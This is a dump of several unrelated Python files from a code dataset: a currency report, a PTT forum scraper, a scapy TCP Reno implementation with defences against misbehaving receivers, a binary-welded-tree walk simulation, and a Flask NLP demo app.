Currency.getBases()\n self.startTable()\n self.row(\"Fill in a Quote for EUR,USD,PYG\")\n self.row(\"Base 1 = %s Base 2 = %s \" % (b1,b2))\n self.endTable()\n self.startTable()\n self.header(\"Currency\",\"Amount\",b1,b2,\"EUR\")\n curs = [\"ARS\",\"USD\",\"EUR\",\"PYG\"]\n amounts = [100,100,100,1000]\n for i in range(0,4):\n cur = Currency.bring(curs[i])\n (curRate,baseRate) = self.getRates(curs[i])\n (ab1,ab2) = cur.convert(amounts[i],curRate,baseRate)\n eu = Currency.convertTo(amounts[i],curRate,baseRate,curs[i],\"EUR\",specs.gDate)\n self.row(curs[i],amounts[i],ab1,ab2,eu)\n self.endTable()\n\n","sub_path":"standard/reports/CurrencyCheckReport.py","file_name":"CurrencyCheckReport.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"303731991","text":"import re\nimport scrapy\nimport MySQLdb\nfrom ptt.items import PttPageListItem\nfrom scrapy.http import Request\n\nclass PttPageListSpider(scrapy.spiders.Spider):\n name = \"ptt\"\n allowed_domains = [\"ptt.cc\"]\n\n def __init__(self, domain='https://www.ptt.cc/bbs/Gossiping/index.html'):\n self.start_urls = [domain]\n\n def make_requests_from_url(self, url):\n request = super(PttPageListSpider, self).make_requests_from_url(url)\n request.cookies['over18'] = '1'\n return request\n\n def parse(self, response):\n sel = response.xpath('//*[@id=\"action-bar-container\"]/div/div[2]/a[2]/@href').extract()[0]\n pattern = re.compile(r'^.*index([0-9]+)\\.html$')\n total = int(pattern.match(str(sel)).group(1))\n\n for id in range(1, total+1):\n url = \"https://www.ptt.cc/bbs/Gossiping/index%s.html\" % id\n yield Request(url=url, callback=self.parse_aticlelist)\n\n def parse_aticlelist(self, response):\n urls = response.xpath('//*[@id=\"main-container\"]/div[2]/div/div[3]/a/@href').extract()\n for url in urls:\n yield Request(url='https://www.ptt.cc'+url, callback=self.parse_article)\n\n def parse_article(self, response):\n title = response.xpath('//*[@id=\"main-content\"]/div[3]/span[2]').extract()[0]\n date = response.xpath('//*[@id=\"main-content\"]/div[4]/span[2]').extract()[0]\n # to do\n\n\n\n\n ","sub_path":"ptt/spiders/ptt_spider.py","file_name":"ptt_spider.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"346394914","text":"# Suppresses Scapy runtime warning\nimport logging\n\nlogging.getLogger(\"scapy.runtime\").setLevel(logging.ERROR)\n\nfrom scapy import all as scp\nimport argparse\nimport threading\nfrom collections import deque\nimport time\nfrom color import cc\nimport random\n\nMSS = 1400\nRETRANSMIT_TIMEOUT = 2.0 # sec\nDUMMY_PAYLOAD = \"*\" * MSS\nH1_ADDR = \"10.0.0.1\"\nH1_PORT = 20001\nH2_ADDR = \"10.0.0.2\"\nH2_PORT = 20002\n\n\nclass Nonce(scp.Packet):\n name = \"Nonce\"\n fields_desc = [scp.IntField(\"nonce\", 0), scp.IntField(\"reply\", 0)]\n\n\nclass TCP_Client:\n def __init__(self, role, host, **kwargs):\n self.seq = 0\n self.next_seq = 1\n self.ack = 1\n self.received_packets = deque()\n self.outstanding_segments = set()\n\n self.cwnd = 1 * MSS\n self.ssthresh = 64 * 1024 # 64KB\n self.dupack = 0\n self.state = \"slow_start\"\n # see [RFC 6298] on how the retransmission timer works\n self.retransmission_timer = None\n\n self.role = role # sender or receiver\n self.log_cache = None\n\n if host == \"h1\":\n self.src_ip = H1_ADDR\n self.dst_ip = H2_ADDR\n self.src_port = H1_PORT\n self.dst_port = H2_PORT\n\n if host == \"h2\":\n self.src_ip = H2_ADDR\n self.dst_ip = H1_ADDR\n self.src_port = H2_PORT\n self.dst_port = H1_PORT\n\n self.limit = None\n # stop the sender after seq_no exceeding this limit\n if role == \"sender\":\n if \"limit\" in kwargs:\n self.limit = kwargs[\"limit\"]\n # list of time logs for plotting\n self.seq_log, self.ack_log = [], []\n self.log_attacker = False\n # verbose flag\n self.verbose = kwargs[\"verbose\"]\n\n \"\"\"\n [defense against DupACK spoofing and Optimistic ACKing]\n We use the \"Singular Nonce\" technique described in section 4.3.\n For each data segment that we send, we include a random 32-bit\n nonce. An ACK is only valid if it contains one of these nonces.\n When we receive a valid ACK, we remove the nonce it replies from\n the nonce pool.\n Therefore, DupACK spoofing or Optimistic ACKing are no longer\n viable because no more spoofed ACKs can be created a priori than\n there are actual data segments sent.\n \"\"\"\n self.nonce_pool = {}\n\n # seed the pseudorandom generator\n random.seed()\n\n # bind Nonce to TCP so that scapy can decode Nonce layer\n scp.bind_layers(scp.TCP, Nonce, dport=H1_PORT)\n scp.bind_layers(scp.TCP, Nonce, dport=H2_PORT)\n\n def get_nonce(self):\n nonce = random.getrandbits(32)\n self.nonce_pool[nonce] = self.nonce_pool.get(nonce, 0) + 1\n return nonce\n\n def send(self):\n if self.limit and self.next_seq > self.limit:\n return\n packet = (\n scp.IP(src=self.src_ip, dst=self.dst_ip)\n / scp.TCP(\n sport=self.src_port, dport=self.dst_port, flags=\"\", seq=self.next_seq\n )\n / Nonce(nonce=self.get_nonce())\n / (DUMMY_PAYLOAD)\n )\n scp.send(packet, verbose=0)\n self.next_seq += MSS\n if self.retransmission_timer is None:\n self.retransmission_timer = time.time()\n self.xprint(\n cc.OKBLUE\n + \"(sent) data seq=%d:%d\"\n % (packet[scp.TCP].seq, packet[scp.TCP].seq + MSS - 1)\n + cc.ENDC\n )\n\n def resend(self, event):\n packet = (\n scp.IP(src=self.src_ip, dst=self.dst_ip)\n / scp.TCP(\n sport=self.src_port, dport=self.dst_port, flags=\"\", seq=self.seq + 1\n )\n / Nonce(nonce=self.get_nonce())\n / (DUMMY_PAYLOAD)\n )\n self.retransmission_timer = time.time()\n scp.send(packet, verbose=0)\n self.xprint(\n cc.WARNING\n + \"(resent:%s) data seq=%d:%d\"\n % (event, packet[scp.TCP].seq, packet[scp.TCP].seq + MSS - 1)\n + cc.ENDC\n )\n\n def send_ack(self, ack_no, nonce):\n # update ack log\n packet = (\n scp.IP(src=self.src_ip, dst=self.dst_ip)\n / scp.TCP(sport=self.src_port, dport=self.dst_port, flags=\"A\", ack=ack_no)\n / Nonce(reply=nonce)\n )\n scp.send(packet, verbose=0)\n self.ack_log.append((time.time() - self.base_time, ack_no))\n self.xprint(cc.OKBLUE + \"(sent) ack ack=%d\" % ack_no + cc.ENDC)\n\n def send_fin(self):\n packet = scp.IP(src=self.src_ip, dst=self.dst_ip) / scp.TCP(\n sport=self.src_port, dport=self.dst_port, flags=\"F\"\n )\n scp.send(packet, verbose=0)\n if self.role == \"sender\":\n msg = \"all data sent\"\n else:\n msg = \"all data received\"\n self.xprint(cc.OKBLUE + \"(sent) fin [%s]\" % msg + cc.ENDC)\n\n def timeout(self):\n if self.retransmission_timer is None:\n return\n elif self.retransmission_timer + RETRANSMIT_TIMEOUT < time.time():\n # on timeout\n self.resend(\"timeout\")\n self.state = \"slow_start\"\n self.ssthresh = self.cwnd / 2\n self.cwnd = 1 * MSS\n self.dupack = 0\n\n def post_receive(self, pkt, status):\n # called after a data segment is received\n # subclass overwrites this function to implement attacks\n\n # extract nonce\n nonce = pkt[Nonce].nonce\n\n self.send_ack(self.ack, nonce)\n\n def receive(self):\n if len(self.received_packets) == 0:\n return\n pkt = self.received_packets.popleft()[0]\n\n # data packet received\n if pkt[scp.TCP].flags == 0:\n # update seq log\n self.seq_log.append((time.time() - self.base_time, pkt[scp.TCP].seq))\n self.xprint(\n cc.OKGREEN\n + \"(received) data seq=%d:%d\"\n % (pkt[scp.TCP].seq, pkt[scp.TCP].seq + MSS - 1)\n + cc.ENDC\n )\n if pkt[scp.TCP].seq == self.ack:\n status = \"new\"\n self.ack += MSS\n while self.ack in self.outstanding_segments:\n self.outstanding_segments.remove(self.ack)\n self.ack += MSS\n elif pkt[scp.TCP].seq > self.ack:\n # a future packet (queue it)\n status = \"future\"\n self.outstanding_segments.add(pkt[scp.TCP].seq)\n else:\n status = \"duplicate\"\n self.post_receive(pkt, status)\n # ack received\n elif pkt[scp.TCP].flags & 0x10: # ACK\n is_ack_valid = True\n\n # [defense against ACK division]\n # reject non-aligned acks\n if (pkt[scp.TCP].ack - 1) % MSS != 0:\n is_ack_valid = False\n\n # [defense against DupACK spoofing and Optimistic ACKing]\n # reject ACK with invalid nonce\n elif not pkt.haslayer(Nonce):\n is_ack_valid = False\n\n else:\n nonce_reply = pkt[Nonce].reply\n nonce_cnt = self.nonce_pool.get(nonce_reply, 0)\n if nonce_cnt == 0:\n is_ack_valid = False\n else:\n # remove nonce from nonce_pool\n if nonce_cnt == 1:\n del self.nonce_pool[nonce_reply]\n else:\n self.nonce_pool[nonce_reply] = nonce_cnt - 1\n\n if is_ack_valid:\n self.xprint(\n cc.OKGREEN\n + \"(received) ack ack=:%d\" % (pkt[scp.TCP].ack - 1)\n + cc.ENDC\n )\n else:\n self.xprint(\n cc.FAIL\n + \"(received) invalid ack ack=:%d\" % (pkt[scp.TCP].ack - 1)\n + cc.ENDC\n )\n return\n\n if pkt[scp.TCP].ack - 1 > self.seq:\n # new ack\n self.seq = pkt[scp.TCP].ack - 1\n \"\"\"\n [RFC 6298]\n (5.3) When an ACK is received that acknowledges new data, \n restart the retransmission timer so that it will expire after \n RTO seconds (for the current value of RTO).\n \"\"\"\n self.retransmission_timer = time.time() # restart timer\n if self.state == \"slow_start\":\n self.cwnd += MSS\n elif self.state == \"congestion_avoidance\":\n self.cwnd += MSS * MSS / self.cwnd\n elif self.state == \"fast_recovery\":\n self.state = \"congestion_avoidance\"\n self.cwnd = self.ssthresh\n self.dupack = 0\n else:\n # duplicate ack\n self.dupack += 1\n \"\"\"\n [RFC 5681]\n On the first and second duplicate ACKs received at a \n sender, a TCP SHOULD send a segment of previously unsent data \n per [RFC 3042] provided that the receiver's advertised window \n allows, the total Flight Size would remain less than or \n equal to cwnd plus 2*SMSS, and that new data is available \n for transmission. Further, the TCP sender MUST NOT change \n cwnd to reflect these two segments [RFC 3042].\n \"\"\"\n if self.dupack < 3:\n self.send()\n elif self.dupack == 3:\n self.state = \"fast_recovery\"\n self.ssthresh = self.cwnd / 2\n self.cwnd = self.ssthresh + 3 * MSS\n # retransmit missing packet\n self.resend(\"triple-ack\")\n elif self.state == \"fast_recovery\":\n # [defense against DupACK spoofing]\n \"\"\"\n [RFC 5681] Section 3.2\n We limit the artificially inflated cwnd to the\n number of outstanding packets.\n \"\"\"\n if self.cwnd + MSS <= self.next_seq - self.seq - 1:\n self.cwnd += MSS\n # fin received\n elif pkt[scp.TCP].flags & 0x1: # FIN\n self.xprint(cc.OKGREEN + \"(received) fin\" + cc.ENDC)\n if self.role == \"sender\" and self.state == \"fin_sent\":\n return \"tear_down\"\n if self.role == \"receiver\":\n self.send_fin()\n return \"tear_down\"\n\n def log_status(self):\n out = \"(control:%s) cwnd=%d, ssthread=%d\" % (\n self.state,\n self.cwnd,\n self.ssthresh,\n )\n if out != self.log_cache:\n self.xprint(out)\n self.log_cache = out\n\n def xprint(self, content):\n if not self.verbose:\n return\n timestamp = time.time() - self.base_time\n print(cc.BOLD + \"{:6.3f} \".format(timestamp) + cc.ENDC + content)\n\n def start_sender(self):\n self.xprint(\"retransmission timeout: %.1fs\" % RETRANSMIT_TIMEOUT)\n last_log_time = 0\n while True:\n if self.state == \"slow_start\" and self.cwnd >= self.ssthresh:\n self.state = \"congestion_avoidance\"\n if self.next_seq - self.seq - 1 < self.cwnd:\n self.send()\n if self.receive() == \"tear_down\":\n self.state = \"tear_down\"\n break\n if self.state != \"fin_sent\":\n self.timeout()\n\n # send FIN when data sent over pre-specified limit\n if self.limit and self.seq >= self.limit:\n if (\n self.state == \"fin_sent\"\n and self.retransmission_timer + RETRANSMIT_TIMEOUT < time.time()\n ):\n continue\n self.send_fin()\n self.retransmission_timer = 0\n self.state = \"fin_sent\"\n\n self.log_status()\n\n def start_receiver(self):\n while True:\n if self.receive() == \"tear_down\":\n self.state = \"tear_down\"\n break\n\n def listen(self):\n def match_packet(pkt):\n return (\n pkt.haslayer(scp.IP)\n and pkt[scp.IP].src == self.dst_ip\n and pkt[scp.IP].dst == self.src_ip\n and pkt.haslayer(scp.TCP)\n and pkt[scp.TCP].sport == self.dst_port\n and pkt[scp.TCP].dport == self.src_port\n ) and pkt[\n scp.TCP\n ].flags & 0x4 == 0 # ignore RST\n\n def queue_packet(pkt):\n self.received_packets.append((pkt, time.time()))\n\n def stop_packet(pkt):\n return pkt.haslayer(scp.TCP) and pkt[scp.TCP].flags & 0x1 != 0 # FIN flag\n\n scp.sniff(lfilter=match_packet, prn=queue_packet, stop_filter=stop_packet)\n\n def write_logs_to_files(self):\n filename = \"attack_log.txt\" if self.log_attacker else \"log.txt\"\n f = open(filename, \"w\")\n for time, seq in self.seq_log:\n f.write(\"%s,%.3f,%d\\n\" % (\"seq\", time, seq))\n for time, ack in self.ack_log:\n f.write(\"%s,%.3f,%d\\n\" % (\"ack\", time, ack))\n f.close()\n\n def start(self):\n listen_t = threading.Thread(target=self.listen)\n # set it to daemon so that it will be killed when the main thread\n # exits\n listen_t.daemon = True\n listen_t.start()\n\n self.base_time = time.time()\n self.xprint(\"connection started\")\n if self.role == \"sender\":\n self.start_sender()\n if self.role == \"receiver\":\n self.start_receiver()\n self.xprint(\"connection terminated\")\n\n if self.role == \"receiver\":\n self.xprint(\"writing seq/ack logs to file ...\")\n self.write_logs_to_files()\n self.xprint(\"writing logs done!\")\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Naive TCP.\")\n parser.add_argument(\n \"--role\",\n dest=\"role\",\n required=True,\n help=\"The role of the TCP client (`sender` or `receiver`)\",\n )\n parser.add_argument(\n \"--host\", dest=\"host\", required=True, help=\"Mininet host (`h1` or `h2`)\"\n )\n parser.add_argument(\n \"--rtt\",\n dest=\"rtt\",\n type=int,\n help=\"The estimated RTT specified in Mininet (in ms).\",\n )\n parser.add_argument(\n \"--limit\",\n dest=\"limit\",\n type=int,\n help=\"Limit the total amount of data to send (in kB).\",\n )\n parser.add_argument(\n \"--verbose\",\n dest=\"verbose\",\n action=\"store_true\",\n help=\"Verbose flag for TCP communication log.\",\n )\n args = parser.parse_args()\n\n kwargs = {}\n if args.limit is not None:\n kwargs[\"limit\"] = args.limit * 1000\n kwargs[\"verbose\"] = args.verbose\n\n if args.rtt is not None:\n # set retransmission timeout to 4 * RTT\n RETRANSMIT_TIMEOUT = max(1.0, args.rtt / 250.0)\n\n tcp = TCP_Client(args.role, args.host, **kwargs)\n tcp.start()\n","sub_path":"project/experiments/misbehaving_receiver/reno_enhanced.py","file_name":"reno_enhanced.py","file_ext":"py","file_size_in_byte":15226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"123465288","text":"from random import randint, shuffle\n\n\nclass Node:\n def __init__(self, colors, flag=None):\n self.left_child_color, self.right_child_color = colors\n self.parent_color = None\n self.id = 0\n if flag:\n self.left_child = None\n self.right_child = None\n\n\nclass Tree:\n def __init__(self, sz):\n self.tree = [Node([None, None]) for _ in range(sz)]\n\n def add_is_valid(self, index_new_node, new_node):\n parent = (index_new_node - 1) // 2\n left_child = 2 * parent + 1\n right_child = 2 * parent + 2\n\n if self.tree[0].left_child_color is None:\n return True, None\n\n elif left_child == index_new_node:\n if self.tree[parent].left_child_color in new_node:\n return False, None\n else:\n return True, self.tree[parent].left_child_color\n elif right_child == index_new_node:\n if self.tree[parent].right_child_color in new_node:\n return False, None\n else:\n return True, self.tree[parent].right_child_color\n\n def add(self, index, node):\n temp = self.add_is_valid(index, node)\n add_is_valid = temp[0]\n if not add_is_valid:\n return False\n\n self.tree[index].left_child_color = node[0]\n self.tree[index].right_child_color = node[1]\n self.tree[index].parent_color = temp[1]\n return True\n\n def __iter__(self):\n return iter(self.tree)\n\n\nclass BWT:\n COLORS = {\n 1: 'green',\n 2: 'blue',\n 3: 'red',\n 4: 'purple'\n }\n\n def __init__(self, depth=4, count_colors=4):\n self.top_tree = Tree(2 ** depth - 1)\n self.bottom_tree = Tree(2 ** depth - 1)\n self.relationship_trees = []\n self.depth = depth\n self.count_colors = count_colors\n self.id = -1\n\n def generate_random_colors(self, exclude=[]):\n colors = set()\n while len(colors) < 2:\n color = randint(1, self.count_colors)\n if color in exclude:\n continue\n colors.add(color)\n return list(colors)\n\n def coloring_random_tree(self, tree):\n for index, node in enumerate(tree.tree):\n self.id += 1\n # листьям не раскрашиваем, но запоминаем цвет родителя\n if index * 2 + 1 >= len(tree.tree):\n tree.tree[index] = Node([None, None], flag=True)\n parent = tree.add_is_valid(index, [None, None])[1]\n tree.tree[index].parent_color = parent\n tree.tree[index].id = self.id\n continue\n\n tree.tree[index].id = self.id\n is_valid = False\n while not is_valid:\n new_node = self.generate_random_colors()\n is_valid = tree.add(index, new_node)\n\n return tree\n\n def copy_colors(self, tree1, tree2):\n for index, node in enumerate(tree1.tree):\n self.id += 1\n tree2.tree[index].id = index\n if index * 2 + 1 >= len(tree1.tree):\n tree2.tree[index] = (Node([None, None], flag=True))\n tree2.tree[index].parent_color = node.parent_color\n tree2.tree[index].id = self.id\n continue\n tree2.tree[index].id = self.id\n tree2.tree[index].left_child_color = node.left_child_color\n tree2.tree[index].right_child_color = node.right_child_color\n tree2.tree[index].parent_color = node.parent_color\n\n return tree2\n\n def coloring_mirror_tree(self, tree1, tree2):\n self.coloring_random_tree(tree1)\n self.copy_colors(tree1, tree2)\n return tree1, tree2\n\n def create_tree(self, tree):\n \"\"\"тестовая функция\"\"\"\n return self.coloring_random_tree(tree)\n\n def bind_trees(self, tree1, tree2):\n last_level = -2 ** (self.depth - 1)\n\n top_tree = tree1.tree[last_level:]\n bottom_tree = tree2.tree[last_level:]\n\n while None in [i.right_child for i in top_tree] or\\\n None in [i.right_child for i in bottom_tree]:\n\n shuffle(top_tree)\n shuffle(bottom_tree)\n\n for index in range(len(top_tree)):\n exclude = [top_tree[index].parent_color,\n bottom_tree[index].parent_color]\n colors = self.generate_random_colors(exclude=exclude)\n\n top_tree[index].left_child = bottom_tree[index]\n top_tree[index].left_child_color = colors[0]\n top_tree[index].right_child_color = colors[1]\n\n bottom_tree[index].left_child = top_tree[index]\n bottom_tree[index].left_child_color = colors[0]\n bottom_tree[index].right_child_color = colors[1]\n\n for node_top in top_tree:\n for node_bottom in bottom_tree:\n if node_top.right_child_color == node_bottom.right_child_color:\n if node_top.left_child != node_bottom and \\\n node_bottom.left_child != node_top:\n node_top.right_child = node_bottom\n node_bottom.right_child = node_top\n break\n\n self.relationship_trees = tree1.tree[last_level:] + tree2.tree[last_level:]\n return self.relationship_trees\n\n def get_node(self, id):\n for node in self.top_tree.tree:\n if node.id == id:\n return node\n for node in self.bottom_tree.tree:\n if node.id == id:\n return node\n return None\n\n @staticmethod\n def counting_color_in_path(path, color):\n count = 0\n for node in path:\n if node.parent_color == color:\n count += 1\n return count\n\n def counting_colors_all_paths(self, paths, color):\n count_colors = {}\n for key in paths.keys():\n count_colors[key] = self.counting_color_in_path(paths[key], color)\n return count_colors\n\n def find_all_paths_tree(self, tree):\n last_level = -2 ** (self.depth - 1)\n paths = {}\n for node in tree.tree[last_level:]:\n path = [node]\n i_node = tree.tree.index(node)\n i_parent = (i_node - 1) // 2\n\n while i_parent >= 0:\n path.append(tree.tree[i_parent])\n i_parent = (i_parent - 1) // 2\n paths[node] = path[::-1]\n\n return paths\n\n def find_all_paths_bwt(self, color):\n paths_top = self.find_all_paths_tree(self.top_tree)\n paths_bottom = self.find_all_paths_tree(self.bottom_tree)\n\n count_colors_top = self.counting_colors_all_paths(paths_top, color)\n count_colors_bottom = self.counting_colors_all_paths(paths_bottom, color)\n\n all_paths = []\n\n for leaf in paths_top:\n # по \"левому пути\"\n path = paths_top[leaf] + paths_bottom.get(leaf.left_child)[::-1]\n count_colors = count_colors_top.get(leaf) + count_colors_bottom.get(\n leaf.left_child)\n if leaf.left_child_color == color:\n count_colors += 1\n all_paths.append((path, count_colors))\n # по \"правому пути\"\n path = paths_top[leaf] + paths_bottom.get(leaf.right_child)[::-1]\n count_colors = count_colors_top.get(leaf) + count_colors_bottom.get(\n leaf.right_child)\n if leaf.right_child_color == color:\n count_colors += 1\n all_paths.append((path, count_colors))\n\n return all_paths\n\n def optimal_way(self, color, mx=None, mn=None):\n all_paths = self.find_all_paths_bwt(color)\n\n if mx:\n all_paths.sort(key=lambda x: x[1], reverse=True)\n elif mn:\n all_paths.sort(key=lambda x: x[1])\n\n return all_paths[0]\n\n @staticmethod\n def condition_for_step_leaf(leaf, step):\n\n # left\n if step == 2:\n leaf = leaf.left_child\n\n # right\n else:\n leaf = leaf.right_child\n return leaf\n\n def condition_for_step_node(self, tree, node, step):\n index_node = tree.tree.index(node)\n left_child = index_node * 2 + 1\n right_child = index_node * 2 + 2\n\n # parent\n if step == 1:\n if node.parent_color is None:\n return node\n node = tree.tree[(index_node - 1) // 2]\n\n # left\n elif step == 2:\n # если лист\n if left_child > len(tree.tree) - 1:\n return self.condition_for_step_leaf(node, step)\n node = tree.tree[left_child]\n\n # right\n else:\n # если лист\n if right_child > len(tree.tree) - 1:\n return self.condition_for_step_leaf(node, step)\n node = tree.tree[right_child]\n return node\n\n def take_step(self, node, step):\n if node in self.top_tree:\n current_tree = self.top_tree\n else:\n current_tree = self.bottom_tree\n\n return self.condition_for_step_node(current_tree, node, step)\n\n def random_walk(self, node):\n current_node = self.top_tree.tree[0]\n count_steps = 0\n\n while current_node != node:\n random_step = randint(1, 3)\n count_steps += 1\n current_node = self.take_step(current_node, random_step)\n\n return current_node.id, count_steps\n\n def quantum_walk(self, node):\n nodes = [self.top_tree.tree[0]]\n count_steps = 0\n\n while node not in nodes:\n\n for i in range(len(nodes)):\n current_node = nodes[i]\n random_step = randint(1, 3)\n first_node = self.take_step(current_node, random_step)\n # nodes[i] = first_node\n if first_node in nodes:\n nodes.pop(nodes.index(first_node))\n nodes.append(first_node)\n\n random_step = randint(1, 3)\n second_node = self.take_step(current_node, random_step)\n if second_node in nodes:\n nodes.pop(nodes.index(second_node))\n nodes.append(second_node)\n count_steps += 1\n\n return len(nodes), count_steps\n","sub_path":"lesson28_BWT.py","file_name":"lesson28_BWT.py","file_ext":"py","file_size_in_byte":10421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"623353915","text":"from nltk.sentiment.vader import SentimentIntensityAnalyzer\nfrom flask import Flask, render_template, request, Markup, jsonify\nimport os\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\nfrom gensim.corpora.dictionary import Dictionary\nfrom collections import defaultdict\nimport itertools\nfrom gensim.models.tfidfmodel import TfidfModel\nimport spacy\nfrom spacy import displacy\nfrom transformers import AutoTokenizer, AutoModelForSequenceClassification\napp = Flask(__name__)\napp.config[\"UPLOAD PATH\"] = \"upload\"\nimport nltk\n\nnltk.download('vader_lexicon')\n\n\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef upload_file():\n articles = []\n all_text = []\n tf = []\n bow = []\n gg = []\n find_word = request.form.get(\"text\")\n if request.method == \"GET\":\n dir = './upload'\n for f in os.listdir(dir):\n os.path.join(dir, f)\n os.remove(os.path.join(dir, f))\n if request.method == \"POST\":\n dir = './upload'\n for f in os.listdir(dir):\n os.path.join(dir, f)\n os.remove(os.path.join(dir, f))\n for f in request.files.getlist('file_name'):\n test = os.path.join(app.config[\"UPLOAD PATH\"], f.filename)\n f.save(os.path.join(app.config[\"UPLOAD PATH\"], f.filename))\n all_text.append(test)\n\n for i in all_text:\n # Read TXT file\n f = open(i, \"r\", encoding=\"utf8\")\n article = f.read()\n # Tokenize the article: tokens\n tokens = word_tokenize(article)\n # Convert the tokens into lowercase: lower_tokens\n lower_tokens = [t.lower() for t in tokens]\n # Retain alphabetic words: alpha_only\n alpha_only = [t for t in lower_tokens if t.isalpha()]\n # Remove all stop words: no_stops\n no_stops = [\n t for t in alpha_only if t not in stopwords.words('english')]\n # Instantiate the WordNetLemmatizer\n wordnet_lemmatizer = WordNetLemmatizer()\n # Lemmatize all tokens into a new list: lemmatized\n lemmatized = [wordnet_lemmatizer.lemmatize(t) for t in no_stops]\n # list_article\n articles.append(lemmatized)\n dictionary = Dictionary(articles)\n\n def BOW(articles):\n a = []\n corpus = [dictionary.doc2bow(a) for a in articles]\n # Save the second document: doc\n doc = corpus[0]\n # Sort the doc for frequency: bow_doc\n bow_doc = sorted(doc, key=lambda w: w[1], reverse=True)\n for word_id, word_count in bow_doc[:5]:\n (dictionary.get(word_id), word_count)\n total_word_count = defaultdict(int)\n for word_id, word_count in itertools.chain.from_iterable(corpus):\n total_word_count[word_id] += word_count\n # Create a sorted list from the defaultdict: sorted_word_count\n sorted_word_count = sorted(\n total_word_count.items(), key=lambda w: w[1], reverse=True)\n for word_id, word_count in sorted_word_count[:5]:\n final = (dictionary.get(word_id), word_count)\n a.append(final)\n return a\n\n def tf_idf(articles):\n b = []\n corpus = [dictionary.doc2bow(a) for a in articles]\n # Save the second document: doc\n doc = corpus[0]\n tfidf = TfidfModel(corpus)\n # Calculate the tfidf weights of doc: tfidf_weights\n tfidf_weights = tfidf[doc]\n # Sort the weights from highest to lowest: sorted_tfidf_weights\n sorted_tfidf_weights = sorted(\n tfidf_weights, key=lambda w: w[1], reverse=True)\n # Print the top 5 weighted words\n for term_id, weight in sorted_tfidf_weights[:5]:\n final2 = dictionary.get(term_id), weight\n b.append(final2)\n return b\n bow = BOW(articles)\n tf = tf_idf(articles)\n data = {\n 'result1': bow,\n 'result2': tf,\n }\n return render_template(\"find.html\", **data)\n return render_template('index.html')\n\n\n@app.route('/lab2.html', methods=['GET', 'POST'])\ndef lab2():\n if request.method == \"POST\":\n nlp = spacy.load('en_core_web_sm')\n firstname = request.form['firstname'].strip()\n doc = nlp(firstname)\n html = displacy.render(doc, style=\"ent\")\n return jsonify({'output': Markup(html)})\n return render_template('lab2.html')\n\n\n@app.route('/filter', methods=['GET', 'POST'])\ndef filter1():\n if request.method == \"POST\":\n nlp = spacy.load('en_core_web_sm')\n firstname = request.form['text'].strip()\n filter = request.form.getlist('filter[]')\n doc = nlp(firstname)\n ft = {\"ents\": filter}\n html = displacy.render(doc, style=\"ent\", options=ft)\n return jsonify({'output': Markup(html)})\n return render_template('lab2.html')\n\n\n@app.route('/fakeNews', methods=['GET', 'POST'])\ndef fakeNews():\n if request.method == \"POST\":\n model_path = \"model\"\n real_news = request.form['text'].strip()\n model = AutoModelForSequenceClassification.from_pretrained(model_path)\n tokenizer = AutoTokenizer.from_pretrained(model_path)\n\n def get_prediction(text, convert_to_label=False):\n # prepare our text into tokenized sequence\n inputs = tokenizer(text, padding=True, truncation=True, max_length=512,\n return_tensors=\"pt\")\n # perform inference to our model\n outputs = model(**inputs)\n # get output probabilities by doing softmax\n probs = outputs[0].softmax(1)\n # executing argmax function to get the candidate label\n d = {\n 0: \"reliable\",\n 1: \"fake\"\n }\n if convert_to_label:\n return d[int(probs.argmax())]\n else:\n return int(probs.argmax())\n predict = get_prediction(real_news, convert_to_label=True)\n # # read the test set\n # test_df = pd.read_csv(\"fake_news/test_lite.csv\", encoding='latin1')\n # # make a copy of the testing set\n # new_df = test_df.copy()\n # # add a new column that contains the author, title and article content\n # new_df[\"new_text\"] = new_df[\"author\"].astype(\n # str) + \" : \" + new_df[\"title\"].astype(str) + \" - \" + new_df[\"text\"].astype(str)\n # # get the prediction of all the test set\n # new_df[\"label\"] = new_df[\"new_text\"].apply(get_prediction)\n # # make the submission file\n # final_df = new_df[[\"id\", \"label\"]]\n # final_df.to_csv(\"submit_final.csv\", index=False)\n return jsonify({'output': predict})\n return render_template('fakeNews.html')\n\n\n@app.route('/search', methods=['GET', 'POST'])\ndef search():\n articles = []\n if (request.method == \"POST\"):\n find_word = request.form.get(\"text\")\n dir = './upload'\n tmp_file = []\n textfile = []\n for f in os.listdir(dir):\n test = None\n test1 = []\n gg = os.path.join(dir, f)\n rr = os.path.join(f)\n textfile.append(rr)\n f = open(gg, \"r\", encoding=\"utf8\")\n article = f.read()\n tokens = word_tokenize(article)\n # Convert the tokens into lowercase: lower_tokens\n lower_tokens = [t.lower() for t in tokens]\n # Retain alphabetic words: alpha_only\n alpha_only = [t for t in lower_tokens if t.isalpha()]\n # Remove all stop words: no_stops\n no_stops = [\n t for t in alpha_only if t not in stopwords.words('english')]\n # Instantiate the WordNetLemmatizer\n wordnet_lemmatizer = WordNetLemmatizer()\n # Lemmatize all tokens into a new list: lemmatized\n lemmatized = [wordnet_lemmatizer.lemmatize(t) for t in no_stops]\n # list_article\n articles.append(lemmatized)\n test1.append(lemmatized)\n dictionary = Dictionary(articles)\n test = Dictionary(test1)\n computer_id = test.token2id.get(find_word)\n tmp_file.append(computer_id)\n data = {'count': tmp_file,\n 'keyword': find_word, 'text_file': textfile}\n return (data)\n return render_template('find.html')\n\n\n@app.route('/sentiment', methods=['GET', 'POST'])\ndef sentiment():\n if request.method == \"POST\":\n text = request.form['text'].strip()\n clean_txt = text.replace(\"[^a-zA-Z#]\", \" \")\n clean_txt = clean_txt.casefold()\n print(clean_txt)\n sid = SentimentIntensityAnalyzer()\n scores = sid.polarity_scores(text)\n for key, value in scores.items():\n result = value\n status = ''\n if(result < 0.5):\n status = 'Negative'\n if(result == 0.5):\n status = 'Neutral'\n if(result > 0.5):\n status = 'Positive'\n data = 'Your comment is ' +status+' And Score : ' + str(result)\n return (data)\n return render_template('sentiment.html')\n\n\nif __name__ == \"__main__\":\n # app.run(host='0.0.0.0',port=8080)\n 